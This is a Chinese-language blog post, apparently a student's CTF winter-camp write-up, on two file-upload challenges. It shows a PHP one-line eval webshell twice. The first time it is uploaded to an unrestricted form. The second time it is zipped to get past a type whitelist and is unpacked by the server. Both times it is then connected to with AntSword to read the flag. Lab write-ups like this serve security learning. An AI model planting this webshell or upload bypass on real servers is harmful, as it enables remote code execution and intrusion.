Fork me on GitHub

冬令营模块二题目

字数统计: 443字   |   阅读时长≈ 1分

冬令营模块二题目

[衔接路线]Normal_Fileupload

这题为常见的文件上传漏洞,并且没有任何限制条件

使用一句话木马写一个php文件

1
2
3
<?php 
@eval($_POST['shell']);
?>

(保存的时候还在报毒😲)

然后上传,根据返回

1
2
3
4
文件上传成功!
文件名:111.php
文件类型:application/octet-stream
文件位于:uploads/111.php

修改url为xxxx/uploads/111.php

进入后发现没有任何返回值,即成功了

再使用蚁剑进行连接,可以在根目录发现flag文件

[衔接路线]Zip_Upload

尝试直接上传一句话木马1.php

1
2
3
<?php 
@eval($_POST['shell']);
?>

并不行,查看附件中的upload.php

1
2
3
4
5
if (!in_array($file_type, $allowed_types)) {
        echo "不支持的文件类型。只允许上传以下类型:JPEG、PNG、PDF、ZIP。";
        echo "<br>你上传的文件类型为:" . $file_type;
        exit;
    }

发现只能上传JPEG、PNG、PDF、ZIP文件,又附件中的Dockerfile中有

1
2
3
# 更新软件源并安装 zip 解压工具和扩展依赖
RUN apt-get update && apt-get install -y zip unzip libzip-dev && \
    docker-php-ext-install zip

即上传的zip文件会被自动解压

那么我们可以尝试将php文件进行压缩再上传,得到

1
2
3
4
5
文件上传成功!
文件名:test.zip
文件类型:application/zip
文件位于:uploads/test.zip
ZIP 文件已成功解压到目录:./zip_decompress/test

然后进行修改url为xxx/zip_decompress/test/1.php,进入后发现没有任何返回值,即成功了

再使用蚁剑进行连接,最后在根目录发现flag文件

[衔接路线]SQLI_with_RCE

忘记写笔记了😨😨(明天补上)

[衔接路线]Include_with_RCE

这题更是不会😇😇(待我学习一下)

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

脑袋,空空哒!